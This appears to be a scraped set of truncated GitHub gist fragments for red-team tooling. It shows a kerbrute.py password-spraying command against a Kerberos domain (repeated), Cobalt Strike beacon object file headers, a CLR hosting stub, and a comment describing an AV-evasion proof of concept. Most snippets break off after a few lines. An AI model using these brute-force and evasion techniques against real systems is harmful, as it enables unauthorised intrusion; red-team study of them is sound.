With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a version of Rubeus that includes the brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a version of Rubeus that includes the brute module:
#include <windows.h> | |
#include <stdio.h> | |
#include <dsgetdc.h> | |
#include <psapi.h> | |
extern "C" { | |
#include "beacon.h" | |
}; | |
// Compile as C++ (/TP) for decltype |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
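/*
This is a POC for a generic technique that I named "Divide and Conquer" internally on our red team assessment. It can be used to bypass behavior-based NextGen AV detection by splitting malicious actions and API calls across distinct processes. Because no single process performs the whole sequence, detection has to correlate activity across related processes rather than judge each process in isolation.
*/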
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
#define APSTUDIO_READONLY_SYMBOLS | |
#include "winres.h" | |
VS_VERSION_INFO VERSIONINFO | |
FILEVERSION 1,3,3,4 | |
PRODUCTVERSION 1,3,3,1 | |
FILEFLAGSMASK 0x3fL | |
#ifdef _DEBUG | |
FILEFLAGS 0x1L | |
#else |
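@echo off
:: Builds Resource.o (a COFF object file) from Resource.rc.
:: This batch script should be run from a VS developer prompt so that rc and
:: cvtres are on PATH.

:: rc compiles the resource script into a binary Resource.res file.
:: Stop on failure so cvtres is never run against a missing or stale
:: Resource.res left over from an earlier build.
rc Resource.rc
if errorlevel 1 exit /b 1

:: cvtres converts the .res file to a COFF object file for x64.
cvtres /MACHINE:x64 /OUT:Resource.o Resource.res
if errorlevel 1 exit /b 1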
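#!/bin/bash
# Builds Resource.o (a COFF object file) from Resource.rc.
# This script needs mingw installed (it calls x86_64-w64-mingw32-windres).

# Stop at the first failing command, so a failed .rc compile is never followed
# by a conversion of a stale Resource.res left over from an earlier build.
set -euo pipefail

# Step 1: convert the .rc resource script into a binary .res resource file.
x86_64-w64-mingw32-windres -J rc -i Resource.rc -O res -o Resource.res

# Step 2: convert the binary .res resource file into a COFF object file.
x86_64-w64-mingw32-windres -J res -i Resource.res -O coff -o Resource.o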
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
#include <windows.h> | |
#include <stdint.h> | |
#include <stdbool.h> | |
#include <stdio.h> | |
#include <sal.h> | |
#include <assert.h> | |
#ifdef _X86_ | |
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics." | |
#endif |